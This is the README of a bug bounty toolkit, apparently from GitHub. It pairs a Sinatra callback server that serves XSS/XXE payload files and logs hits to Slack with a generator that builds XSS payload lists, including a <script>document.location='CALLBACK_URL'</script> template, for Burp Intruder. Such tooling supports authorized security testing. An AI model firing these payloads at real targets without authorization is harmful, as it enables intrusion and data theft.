Skip to content

Latest commit

 

History

History
125 lines (84 loc) · 4.81 KB

README.md

File metadata and controls

125 lines (84 loc) · 4.81 KB

💥 Bug bounty in a box

This repository contains all* that you should need to get up and running to test for bugs against your targets.

* Ok, literally not everything but it's a good start!

🚦 Project Status

This is by no means "production ready"; there are still some server configuration options that need to be explored before this should be run in production.

:shipit: To-do list

  1. Add more payloads!
  2. Add more endpoints!
  3. Add "Development" guide

🏃 Quickstart

To get up & hacking, you'll need to:

  1. Move the configuration sample: mv config/application.yml.sample config/application.yml
  2. Edit the config/application.yml to your preferences
  3. Install the gems: bundle install
  4. Start the server: ruby app.rb
  5. Move the payload sample: mv payloads/xss.yml.sample payloads/xss.yml
  6. Generate the payloads: ruby generate_payloads.rb --callback=YOUR_SERVER_URL --target=YOUR_TARGET
  7. Use payloads/xss.txt in Burp's Intruder (or something similar)
  8. Cross your fingers...
  9. Profit!

🐳 Docker Quickstart

Note: You cannot currently generate payloads with the Docker container. The Docker container only runs the server.

To get up & running in Docker, clone this repository and run the following:

mv config/application.yml.sample config/application.yml
vim config/application.yml # Edit your config values!
mkdir -p logs
docker build -t bbb . && docker run -d \
-v $(pwd)/config/application.yml:/app/config/application.yml \
-v $(pwd)/logs/:/app/logs/ \
-p 4567:4567 \
-e "APP_ENV=production" \
bbb

Then, you should be able to curl localhost:4567 and see the hello world!

🌐 Production Quickstart

If you'd like to know how to set up the Bug Bounty in a Box callback server for "production" use, check out the Wiki.

💁 How does this work?

This "bug bounty in a box" has two different components:

  1. A payload callback server
  2. A payload generator

📟 Callback Server

The callback server, written in Ruby & using Sinatra, currently has the following capabilities:

  • Callback: A callback with a payload & target parameter will log the "callback" to a on-server text log as well as send a Slack message to a Slack webhook. (/callback)
  • Payloads: A payload file of your choice that will contain your callback URL. (/payload)
    • Currently supports:
      • JavaScript (js) for XSS
      • SVG (svg) for XSS
      • XML (xml) for XXE
      • XML (svg) for XXE
  • Redirect: Redirects to a specified URL in the redirect GET parameter. (/redirect)
  • Unauthorized: Throws a 401 for non-OPTIONS & non-HEAD requests. Also accepts a content_type parameter to return a specific content type. (/unauthorized)

Configuring the server

You can configure the server in config/application.yml! See below for the different configuration options.

Slack

In order to receive Slack callbacks, you'll need to set the appropriate slack_url. To generate an incoming webhook for your Slack instance, check out Slack's Help Center.

Logging

If you'd like to change either the frequency of the log rotation or the log filenames, check out the configuration file.

😈 Payload Generator

The payload generator uses .yml files to generate a .txt files that contain a list of payloads that can be used in a tool like Burp Intruder.

Running the payload generator

Before running the payload generator, make sure you have some properly formatted .yml files in the payloads folder! After you've done that, you'll need to run the payload generator with the --callback and --target flags like such:

ruby generate_payloads.rb --callback=localhost:4567/callback --target=www.example.com

Then, check out the payloads folder for the .txt file with a list of payloads!

Configuring payloads

In order to add a new class of payloads, just create a new .yml file with the following:

name: XSS
payloads:
  - description: A simple XSS payload
    payload: <script>document.location='CALLBACK_URL'</script>
  - payload: <script>document.location="CALLBACK_URL"</script>

The CALLBACK_URL will be replaced with whatever is passed in with the --callback flag with some added parameters of (1) a callback description & (2) the target.

🙌 Contributing

Want to contribute? Great! Here's what you do:

  1. Fork this repository
  2. Push some code to your fork
  3. Come back to this repository and open a PR
  4. After some review, get that PR merged to master
  5. 🎉 Thank you for your contribution!!

Feel free to also open an issue with any bugs/comments/requests!